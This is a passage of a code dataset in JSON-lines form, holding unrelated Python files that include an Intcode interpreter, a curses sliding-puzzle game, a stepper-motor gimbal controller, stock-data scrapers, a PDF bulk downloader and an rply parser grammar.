Exception(\"Invalid parameter mode for setting\")\n\n \n def add(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n sum_ = 0\n for i in range(2):\n sum_ += self.get_value(self.ip+i+1, params_mode[i])\n self.set_value(sum_, self.ip+3, params_mode[2])\n self.ip += 4\n\n def multiply(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n mul = 1\n for i in range(2):\n mul *= self.get_value(self.ip+i+1, params_mode[i])\n self.set_value(mul, self.ip+3, params_mode[2])\n self.ip += 4\n\n def 
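# --- Editor's note: illustrative sketch, not part of the original file. ---
# Each Intcode instruction above packs the opcode into the two lowest decimal
# digits and one parameter mode per higher digit (0 = position, 1 = immediate,
# 2 = relative). A standalone arithmetic version of the decoding that the
# methods perform with the f"{code:05}" string-reversal trick:
def decode(code, n_params=3):
    opcode = code % 100
    modes = [(code // 10 ** (i + 2)) % 10 for i in range(n_params)]
    return opcode, modes

assert decode(1002) == (2, [0, 1, 0])  # multiply; second parameter immediate
# --- end editor's note ---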
read_input(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:03}\"[:-2]))))\n x = self.inputs.pop(0)\n self.set_value(x, self.ip+1, params_mode[0])\n self.ip += 2\n\n def output(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:03}\"[:-2]))))\n out = self.get_value(self.ip+1, params_mode[0])\n self.outputs.append(out)\n self.ip += 2\n \n def jmp(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:04}\"[:-2]))))\n test_address = [0, 0]\n for i in range(2):\n test_address[i] = self.get_value(self.ip+i+1, params_mode[i])\n if test_address[0]:\n self.ip = test_address[1]\n else:\n self.ip += 3\n\n def jmpe(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:04}\"[:-2]))))\n test_address = [0, 0]\n for i in range(2):\n test_address[i] = self.get_value(self.ip+i+1, params_mode[i])\n if test_address[0]==0:\n self.ip = test_address[1]\n else:\n self.ip += 3\n \n def lt(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n operands = [0,0]\n for i in range(2):\n operands[i] = self.get_value(self.ip+i+1, params_mode[i])\n out = 1 if operands[0] < operands[1] else 0\n self.set_value(out, self.ip+3, params_mode[2])\n self.ip += 4\n\n def equals(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n operands = [0,0]\n for i in range(2):\n operands[i] = self.get_value(self.ip+i+1, params_mode[i])\n out = 1 if operands[0] == operands[1] else 0\n self.set_value(out, self.ip+3, params_mode[2])\n self.ip += 4\n\n def adjust_relbase(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:03}\"[:-2]))))\n value = self.get_value(self.ip+1, params_mode[0])\n self.relative_base += value\n self.ip += 2\n\n","sub_path":"Day-9/pysol/computer.py","file_name":"computer.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"177337526","text":"import urllib\nfrom BeautifulSoup import *\nimport re\n\nurl = 'http://quote.eastmoney.com/stocklist.html'\n\nhtml = urllib.urlopen(url).read().decode('gbk')\nsoup=BeautifulSoup(html)\ntags = soup('a')\ntags_ = tags[80:4066]\nlist=[]\ni=0\n\nwhile i < len(tags_):\n list.append(re.findall('\\((.*)\\)',str(tags_[i])))\n i=i+1\n\n#stockurl = 'http://quote.eastmoney.com/sh'+list[2000][0]+'.html'\nstockurl = 'http://table.finance.yahoo.com/table.csv?s=601857.ss'\nm=0\n\n'''\nwhile m < 10:\n stockurl = stockurl +'sh' + list[m][0]\n m=m+1\n if m == 10:\n break\n stockurl = stockurl + ','\n\nwhile m < 1000:\n stockurl = stockurl + list[m][0]\n m=m+1\n if m == 1000:\n break\n stockurl = stockurl + ','\n\nwhile m < 1000:\n stockurl = stockurl + list[m][0]\n m=m+1\n if m == 1000:\n break\n stockurl = stockurl + ','\n''' \nhtml = urllib.urlopen(stockurl).read().decode('gbk')\nsoup = BeautifulSoup(html)\n","sub_path":"stock-number.py","file_name":"stock-number.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"232481195","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom torch.autograd import Variable\n\n\nclass LSTMClassifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, vocab_size, label_size, batch_size):\n super(LSTMClassifier, self).__init__()\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.word_embeddings = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_dim//2, 
bidirectional=True)\n self.hidden2label = nn.Linear(hidden_dim, label_size)\n self.dropout = nn.Dropout(0.5)\n\n\n def last_timestep(self, unpacked, lengths):\n # Index of the last output for each sequence.\n idx = (lengths - 1).view(-1, 1).expand(unpacked.size(0),\n unpacked.size(2)).unsqueeze(1)\n if torch.cuda.is_available():\n idx = idx.cuda()\n\n return unpacked.gather(1, idx).squeeze()\n\n def init_hidden(self):\n if torch.cuda.is_available():\n h0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2)).cuda()\n c0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2)).cuda()\n else:\n h0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2))\n c0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2))\n return (h0, c0)\n\n def forward(self, sentence,lengths):\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(sentence, lengths,batch_first=True)\n lstm_out, self.hidden = self.lstm(packed, self.hidden)\n unpacked, unpacked_len = torch.nn.utils.rnn.pad_packed_sequence(lstm_out,batch_first=True)\n # get the outputs from the last *non-masked* timestep for each sentence\n last_outputs = self.last_timestep(unpacked, unpacked_len)\n last_outputs = self.dropout(last_outputs)\n #hidden_1 = self.relu1(last_outputs)\n y = self.hidden2label(last_outputs)\n return y\n","sub_path":"gru_pretrained.py","file_name":"gru_pretrained.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"354205823","text":"import random\nimport curses\nimport numpy as np\n\n###### some curses func \ndef display_info(str, x, y,):\n global stdscr\n stdscr.addstr(y,x,str)\n stdscr.refresh()\n\ndef get_ch_and_continue():\n global stdscr\n try:\n stdscr.nodelay(0)\n ch=stdscr.getch()\n stdscr.nodelay(1)\n except:\n exit(2)\n return ch\n\ndef set_win():\n global stdscr\n curses.noecho()\n curses.cbreak()\n stdscr.nodelay(1)\n\ndef unset_win():\n global stdscr\n curses.nocbreak()\n stdscr.keypad(0)\n curses.echo()\n curses.endwin()\n################### over\n\ndef generate_std_list(puzzle=15):\n \n '''\n return [1,2,...15,0]\n '''\n\n std = list(range(1,puzzle+1)) + list(range(1))\n return std\n\n\ndef get_puzzle_shape(puzzle=15):\n '''\n return a number n*n\n '''\n \n return int(np.sqrt(puzzle+1))\n\n\ndef list_to_np(list_puzzle,shape=4):\n '''\n convert a list to array\n '''\n np_puzzle = np.array(list_puzzle)\n \n return np_puzzle.reshape((shape,shape))\n \ndef find_zero_position(np_puzzle,shape=4):\n '''\n get 0 position at array\n '''\n for i in range(shape):\n for j in range(shape):\n if np_puzzle[i,j] == 0:\n return (i,j)\n\ndef game_is_ok(np_puzzle,np_std_puzzle):\n \n is_ok = np_puzzle == np_std_puzzle\n if is_ok.all():\n return True\n else:\n return False\n\ndef move_up(zero_position,shape=4):\n \n if zero_position[0] == shape - 1 :\n return False\n\n else:\n swap_position = (zero_position[0]+1,zero_position[1])\n return swap_position\n\ndef move_down(zero_position,shape=4):\n \n if zero_position[0] == 0:\n return False\n \n else:\n swap_position = (zero_position[0]-1,zero_position[1])\n return swap_position\n\ndef move_left(zero_position,shape=4):\n \n if zero_position[1] == shape - 1:\n return False\n else:\n swap_position = (zero_position[0],zero_position[1]+1)\n return swap_position\n\ndef move_right(zero_position,shape=4):\n\n if zero_position[1] == 0:\n return False\n else:\n swap_position = (zero_position[0],zero_position[1]-1)\n return swap_position\n\ndef gui(np_array):\n \n size 
= len(np_array)\n length = get_puzzle_shape(puzzle=15)\n\n gui_str = ''\n init_str = '+' + ('-'*length + '+')*size\n gui_str += init_str + '\\n'\n\n for i in np_array:\n for j in i:\n if j == 0:\n j = ' '\n space = length - len(str(j))\n gui_str += '|' + ' '*space + str(j)\n gui_str += '|\\n'\n gui_str += init_str + '\\n'\n return gui_str\n\n\ndef generate_random_array(std_np_puzzle,n=1000,shape=4):\n \n xx_np_puzzle = np.copy(std_np_puzzle)\n s = [move_up,move_left,move_down,move_right]\n for i in range(n):\n move_func = random.choice(s)\n zero_position = find_zero_position(xx_np_puzzle,shape)\n if move_func(zero_position,shape):\n next_position = move_func(zero_position,shape)\n tmp = xx_np_puzzle[zero_position]\n xx_np_puzzle[zero_position] = xx_np_puzzle[next_position]\n xx_np_puzzle[next_position] = tmp\n \n return xx_np_puzzle\n\nif __name__ == '__main__':\n \n stdscr = curses.initscr() ### curses ....\n UP,DOWN,LEFT,RIGHT=65,66,68,67\n banner = '//[q]quit/[r]restart'\n author = '//[A]uthor: Hu/[E]mail:ll104567i@163.com'\n\n puzzle = 15\n shape = get_puzzle_shape(puzzle)\n std_np_puzzle = list_to_np(generate_std_list(puzzle))\n random_np_puzzle = generate_random_array(std_np_puzzle)\n\n while 1:\n try:\n set_win()\n stdscr.clear()\n display_info(banner,0,1)\n display_info(author,0,2)\n display_info(gui(random_np_puzzle),0,3)\n\n '''\n Time mode\n '''\n\n if game_is_ok(std_np_puzzle,random_np_puzzle):\n display_info(banner,0,1)\n display_info(author,0,2)\n display_info(gui(std_np_puzzle),0,3)\n display_info('Niu bi',0,11)\n\n display_info('>>>',0,12)\n c = get_ch_and_continue()\n if c in (ord('q'),ord('Q')):\n exit()\n if c in (ord('r'),ord('R')):\n random_np_puzzle = generate_random_array(std_np_puzzle)\n stdscr.clear()\n display_info(gui(random_np_puzzle),0,0)\n\n if c in (ord('x'),ord('X')):\n random_np_puzzle = np.copy(std_np_puzzle)\n\n if c in (ord('w'),UP):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_up(zero_position,shape):\n next_position = move_up(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n\n if c in (ord('a'),LEFT):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_left(zero_position,shape):\n next_position = move_left(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n \n if c in (ord('s'),DOWN):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_down(zero_position,shape):\n next_position = move_down(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n\n if c in (ord('d'),RIGHT):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_right(zero_position,shape):\n next_position = move_right(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n else:\n continue\n finally:\n unset_win()\n","sub_path":"puzzle/puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"352915793","text":"import dashie.core as base\nimport dashie.db.db as dbfunc\n\n\n@base.dashiefunc\nasync def log(message, client):\n 
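# --- Editor's note, not part of the original file. ---
# The body below looks up a post with `dbfunc.Log.get(log, params[2])`, i.e.
# it calls the method through the class and passes the instance by hand.
# Calling the bound method directly is equivalent and more idiomatic:
#
#     post = log.get(params[2])
#
# --- end editor's note ---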
params = message.content.split()\n    log = dbfunc.Log()\n    if len(params) > 1:\n        if params[1] in (\"Log\", \"log\"):\n            post = dbfunc.Log.get(log, params[2])\n            await client.send_message(message.channel,\n                                      \"**Post {}:** User: `{}` Channel: `{}` Server: `{}`\\n**Message:** ```{}```\"\n                                      .format(post.id, post.User, post.Channel, post.Server, post.Message))\n            return\n\n        else:\n            return\n","sub_path":"dashie/db/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"54207680","text":"import sys; readl = sys.stdin.readline\n\nn = int(readl())\n\nwords = []\nfor _ in range(n):\n    words.append(readl().rstrip())\n\nwords = list(set(words))\n\nwords.sort()\nwords.sort(key= len)\n\nprint(*words, sep= \"\\n\")\n","sub_path":"Python/BOJ/정렬/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"320255968","text":"import RPi.GPIO as GPIO\nimport time\nimport pigpio\nimport os\n\npi=pigpio.pi()\nif not pi.connected:\n    exit()\n\nGPIO.setmode(GPIO.BOARD) #Set Raspberry Pi GPIO to BOARD numbering (as opposed to BCM)\n\nControlPin = {'x':[29,31,33,35],\n\t\t'y':[37,36,38,40]}\n\n#for pin in ControlPin['x']:\n#\tGPIO.setup(pin, GPIO.OUT) #Set each pin to the OUTPUT mode\n#\tGPIO.output(pin,0) #Make sure they start as Off\nfor pin in ControlPin['y']:\n\tGPIO.setup(pin, GPIO.OUT)\n\tGPIO.output(pin,0)\n\n\n#GPIO.setup(7, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n#Keeping this for when I add sensors / limit switches, useless for now\n\nx_lim = float(180) #using type float() so we don't lose degrees over time from rounding\ny_lim = float(180)\n\ndef checklimit(axis): #Returns true or false during go() to signal that the global limits are within/outside their set range\n\tif axis == 'x':\n\t\treturn x_lim >= 360 or x_lim <= 0\n\telse:\n\t\treturn y_lim >= 300 or y_lim <= 60\n\ndef updatelim(dir,axis): #update current angle of global limit vars based on current vector\n\tglobal x_lim\n\tglobal y_lim\n\tif dir == 1: #first number of sequence handed to updatelim is either 1 or 0 (forward or backwards) this determines direction of vector\n\t\tx = 1\n\tif dir == 0:\n\t\tx = -1\n\tif axis == 'x':\n\t\tx_lim = x_lim + (.703125 * x) #these motors have 512 steps per revolution, each step is .703125 degrees\n\tif axis == 'y':\n\t\ty_lim = y_lim + (.703125 * x)\n\ndef go(seq,steps,speed,axis): #Takes the forward or backwards sequence, number of steps, delay between steps in milliseconds, and axis to move the appropriate motors the desired number of steps\n\tglobal x_lim\n\tglobal y_lim\n\tfor i in range(steps): #in a typical keypress, this is 1\n\t\tupdatelim(seq[1][1],axis) #checks the first number of the current sequence to determine whether this is forward or backwards (see updatelim)\n\t\tif checklimit(axis): #If the axis is outside its limits, nope nope nope nope.\n\t\t\tbreak\n\t\tfor halfstep in range(8): #the sequences of 1's and 0's later on (f/b sequences) represent the on/off state of each output pin for a given axis. 
we have to switch this 8 times just to do one step\n\t\t\tfor pin in ControlPin[axis]: #for each one of THOSE 8 sequences, we change the four output pins accordingly\n\t\t\t\tGPIO.output(pin, seq[halfstep][ControlPin[axis].index(pin)])\n\t\t\ttime.sleep(float(speed)/1000) #we're moving a physical metal shaft here, so let's sleep and let it have a bit of time to catch up to what we're outputting, or else the motor will skip steps and not move anywhere.\n\ndef home(axis):\n\tglobal x_lim\n\tglobal y_lim\n\tif axis == 'x': #pretty simple. Monitor x and y axis angles until each is at 180 (straight up).\n\t\twhile x_lim != 180:\n\t\t\tif x_lim > 180:\n\t\t\t\tgo(b,1,2,axis)\n\t\t\tif x_lim < 180:\n\t\t\t\tgo(f,1,2,axis)\n\tif axis == 'y':\n\t\twhile y_lim != 180:\n\t\t\tif y_lim > 180:\n\t\t\t\tgo(b,1,2,axis)\n\t\t\tif y_lim < 180:\n\t\t\t\tgo(f,1,2,axis)\n#---------------------------\nf = [ [1,0,0,0], #each group in this sequence represents the state of four output pins.\n\t[1,1,0,0], #imagine the diagonal shape of 1's as the direction we're pushing magnetic current\n\t[0,1,0,0],\n\t[0,1,1,0],\n\t[0,0,1,0],\n\t[0,0,1,1],\n\t[0,0,0,1],\n\t[1,0,0,1] ]\n\nb = [ [0,0,0,1],\n\t[0,0,1,1],\n\t[0,0,1,0],\n\t[0,1,1,0],\n\t[0,1,0,0],\n\t[1,1,0,0],\n\t[1,0,0,0],\n\t[1,0,0,1] ]\n\n\nkeymap = { 1:[b,1,2,'y'], #Created a dictionary of all key mappings, and direction/steps/speed/axis for each key.\n\t   2:[f,1,2,'y'], #I've created more keys for a \"two handed layout\" to make moving the gimbal in either 1 small step, or one step of 45 degrees.\n\t   3:[b,1,2,'x'],\n\t   4:[f,1,2,'x'],\n\t   5:[b,64,1,'y'],\n\t   6:[f,64,1,'y'],\n\t   7:[b,64,1,'x'],\n\t   8:[f,64,2,'x']}\n\n#go(*keymap[6])\n#home('y')\n\n# open a terminal and run: sudo systemctl enable pigpiod\n\n\ndef foo():\n    foo.counter += 1\nfoo.counter = 0\npre_degree = 0\n\n\ndef cbf(gpio,level,tick):\n    global pre_degree\n\n    if (level == 0) and (foo.counter == 1):\n        cbf.y = tick\n        foo.counter = 0\n        dc = cbf.y - cbf.x\n        #print(dc)\n        degree = round((dc - 1100)*120/(750*0.703125))\n\n        diff = degree - pre_degree\n        if diff >=10:\n            print(diff)\n            go(f,diff,1,'y')\n            pre_degree = degree\n        if diff <= -10:\n            print(diff)\n            go(b,abs(diff),1,'y')\n            pre_degree = degree\n\n        #old_degree = degree\n        #if diff >= 0:\n        #\tgo(b,diff,1,'y')\n        #else:\n        #\tgo(f,abs(diff),1,'y')\n\n    if level == 1:\n        foo()\n        if foo.counter == 1:\n            cbf.x = tick\n    #time.sleep(0.2)\n    #endif\n    #endif\n#enddef cbf\n#----------------------------\n\n\ncb1=pi.callback(17,pigpio.EITHER_EDGE,cbf)\n","sub_path":"UAV_thesis/step_motor_gimbal-1.py","file_name":"step_motor_gimbal-1.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"159379966","text":"import FinanceDataReader as fdr\nfrom database import DB\n\nmarket_symbol_list = ['KOSPI', 'KOSDAQ']\n\nstart_date = '2000-01-01'\nend_date = '2019-08-31'\n\nfor market_symbol in market_symbol_list:\n    print(market_symbol)\n    listed_stocks = fdr.StockListing(market_symbol)\n    code_list = listed_stocks['Symbol'].to_list()\n\n    for i, code in enumerate(code_list):\n        print(\"{} / {}\".format(i+1, len(code_list)))\n        df = fdr.DataReader(code, start_date, end_date)\n        df.reset_index(inplace=True)\n        df['Date'] = df['Date'].apply(lambda t: t.strftime(\"%Y%m%d\"))\n        drop_columns = ['Volume', 'Change']\n        df.drop(drop_columns, inplace=True, axis=1)\n        # data = df.loc[:, ['Date', 'Open', 'High', 'Low', 'Close', 'Date']].values.tolist()\n        data = df.loc[:, ['Date', 
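# --- Editor's note: illustrative sanity check, not part of the original file. ---
# The gimbal code above relies on 512 steps per revolution, i.e. 0.703125
# degrees per step, and on 64 steps for the 45-degree "big" moves in keymap:
assert 360.0 / 512 == 0.703125
assert 64 * 0.703125 == 45.0
# --- end editor's note ---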
'Open', 'High', 'Low', 'Close']].values.tolist()\n\n sql = (\n 'INSERT INTO `adjusted_daily_price` (`code`, `date`, `open`, `high`, `low`, `close`) '\n 'SELECT * FROM (SELECT '\n '\"{code}\" as code, '\n '%s as date, '\n '%s as open, '\n '%s as high, '\n '%s as low, '\n '%s as close '\n ') AS input '\n # 'WHERE NOT EXISTS( '\n # ' SELECT code, date FROM `adjusted_daily_price` WHERE code = \"{code}\" AND date = %s '\n # ')LIMIT 1; '\n ).format(code=code)\n print(sql)\n DB.cursor.executemany(sql, data)\n DB.con.commit()\n\n\n","sub_path":"crawling_daily_price.py","file_name":"crawling_daily_price.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"488000437","text":"import urllib.request\nimport urllib\nimport random\nimport string\nimport sys\nimport pathlib\nfrom bs4 import BeautifulSoup\nimport re\n\nif len(sys.argv) < 2:\n print('ERROR: Downloader requires the number of PDFs to attempt to download as an argument, download directory optional')\n quit()\n\nif int(sys.argv[1]) <= 0:\n print('ERROR: Number of PDFs to be attempted to download must be larger than 0')\n quit()\n\nprint('Random PDF File Download started')\n\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\ndir = 'download'\n\nif len(sys.argv) == 3:\n dir = str(sys.argv[2])\n\npathlib.Path(dir).mkdir(parents=True, exist_ok=True)\n\nfor x in range(0, int(sys.argv[1])):\n try:\n html_page = urllib.request.urlopen(\"https://dare.uva.nl/search?browse-all=yes;docsPerPage=1;startDoc=\" + str(x))\n soup = BeautifulSoup(html_page, features=\"html.parser\")\n for link in soup.findAll('a'):\n href = link.get('href')\n #if href.startswith('https://pure.uva.nl/ws/files/'):\n if href and href.endswith('.pdf'):\n print(href)\n urllib.request.urlretrieve(href, dir + '/' + randomString(20) + '.pdf')\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n print('ERROR: Encountered exception, dropping request')\n","sub_path":"PDFDownload.py","file_name":"PDFDownload.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"273248586","text":"#!/usr/bin/env pypy\n# coding=utf-8\n# vim: ai ts=4 sts=4 et sw=4 ft=python\n#\n# # Released under MIT License\n#\n# Copyright (c) 2016 Konrad Podlawski.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom rply import ParserGenerator\n\nfrom rpyfox.errors.pg import UnexpectedEnd, ParseError\nfrom rpyfox.ply.ast import *\nfrom rpyfox.ply.lexer import RULES\n\nPRECEDENCE = [\n ('left', ['EQ']),\n ('left', ['FUN']),\n ('left', [',']),\n ('left', ['COMPARISON']),\n ('left', ['PLUS', 'MINUS']),\n ('left', ['APPLICATION']),\n ('left', ['ASTERISK', '/', '%']),\n]\n\nparser_generator = ParserGenerator(RULES,\n precedence=PRECEDENCE,\n cache_id=\"rpyfox\")\n\n\n@parser_generator.production(\"main : statements\")\ndef main_module(state, p):\n state.rule = 'main_module'\n return p[0]\n\n\n@parser_generator.production(\"statements : statement statements\")\ndef statements_multiple(state, p):\n state.rule = 'statements_multiple'\n p[1].prepend_statement(p[0])\n return p[1]\n\n\n@parser_generator.production(\"statements : statement\")\ndef statements_single_expression(state, p):\n state.rule = 'statements_single_expression'\n return Statements(statements=[p[0]],\n sourcepos=p[0].get_sourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"statement : expression PERIOD\")\ndef statement_expression(state, p):\n state.rule = 'statement_expression'\n return p[0]\n\n\n@parser_generator.production(\n \"expression : expression BACKTICK atom BACKTICK expression\")\ndef binop_builtin(state, p):\n state.rule = 'binop_application'\n\n return Application(\n f=Application(f=p[2], param=p[0],\n sourcepos=p[0].get_sourcepos(), filename=state.filename),\n param=p[4],\n sourcepos=p[4].get_sourcepos(),\n filename=state.filename)\n\n\n# region expressions {{\n# Multiplication\n@parser_generator.production(\"expression : expression ASTERISK expression\")\n@parser_generator.production(\"expression : expression / expression\")\n@parser_generator.production(\"expression : expression % expression\")\n@parser_generator.production(\"expression : expression AMPERSAND expression\")\n# Addition\n@parser_generator.production(\"expression : expression PLUS expression\")\n@parser_generator.production(\"expression : expression MINUS expression\")\n# Comparisons\n@parser_generator.production(\"expression : expression > expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression < expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression >= expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression <= expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression != expression\",\n precedence=\"COMPARISON\")\n# Accessors\n@parser_generator.production(\"expression : expression DCOLON expression\")\n# Combinators\n@parser_generator.production(\"expression : expression , expression\")\n@parser_generator.production(\"expression : expression ; expression\")\n# Equality, clause, functions\n@parser_generator.production(\"expression : expression EQ expression\")\n@parser_generator.production(\"expression : expression CLAUSE_SYM expression\")\n@parser_generator.production(\"expression : expression FUN expression\")\ndef expression_binop(state, p):\n state.rule = 'expression_binop'\n\n op = Atom(name=p[1].getstr(),\n sourcepos=p[1].getsourcepos(), filename=state.filename)\n\n return Application(\n 
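# a binary operator desugars into curried application: ((op lhs) rhs)\n 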
f=Application(f=op, param=p[0],\n sourcepos=p[0].get_sourcepos(), filename=state.filename),\n param=p[2],\n sourcepos=p[2].get_sourcepos(),\n filename=state.filename)\n\n\n@parser_generator.production(\"expression : LPAREN expression RPAREN\")\ndef expression_parens(state, p):\n state.rule = 'expression_parens'\n return p[1]\n\n\n@parser_generator.production(\"expression : atom\")\ndef expression_single_atom(state, p):\n state.rule = 'expression_single_atom'\n return p[0]\n\n\n@parser_generator.production(\"expression : expression expression\",\n precedence=\"APPLICATION\")\ndef expression_application(state, p):\n state.rule = 'expression_application'\n return Application(f=p[0], param=p[1],\n sourcepos=p[0].get_sourcepos(), filename=state.filename)\n\n\n# }} endregion expressions\n\n# region atoms {{\n@parser_generator.production(\"atom : primitive\")\n@parser_generator.production(\"atom : var\")\ndef atom(state, p):\n state.rule = 'atom'\n return p[0]\n\n\n@parser_generator.production(\"primitive : STRING\")\ndef primitive_string(state, p):\n state.rule = 'primitive_string'\n return String(p[0].getstr().strip(\"\\\"\"),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"primitive : INTEGER\")\ndef primitive_integer(state, p):\n state.rule = 'primitive_integer'\n return Integer(int(p[0].getstr()),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"primitive : FLOAT\")\ndef primitive_float(state, p):\n state.rule = 'primitive_float'\n return Float(float(p[0].getstr()),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"atom : GROUND_VAR\")\ndef ground_var(state, p):\n state.rule = 'ground_var'\n return Atom(name=p[0].getstr(),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"var : FREE_VAR\")\ndef free_var(state, p):\n state.rule = 'free_var'\n return Variable(name=p[0].getstr(),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"var : DEST_VAR\")\ndef dest_var(state, p):\n state.rule = 'dest_var'\n return DestVariable(name=p[0].getstr(),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n# }} endregion atoms\n\n@parser_generator.error\ndef error_handler(state, token):\n is_unexpected_end = token.gettokentype() == \"$end\"\n if is_unexpected_end:\n ex = UnexpectedEnd\n else:\n ex = ParseError\n raise ex(token=token, source=state.source, rule=state.rule)\n","sub_path":"rpyfox/ply/parser/pg.py","file_name":"pg.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"615024468","text":"import os.path\nfrom utils.graph import create_bound_graph\n\n\ndef get_authoritative_ontology(skos_location):\n return create_graph(skos_location)\n\n\ndef create_graph(skos_location):\n g = create_bound_graph()\n\n # The ontology file is in the same folder as this file, called 'otd.ttl'.\n # That file is the canonical description of the ontology.\n otd_ontology = os.path.join(\n os.path.dirname(__file__),\n 'otd.ttl'\n )\n\n g.parse(location=otd_ontology, format='turtle')\n\n if skos_location:\n g.parse(location=skos_location)\n\n return g\n","sub_path":"ontology/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"287992766","text":"import os\nBASE_DIR = 
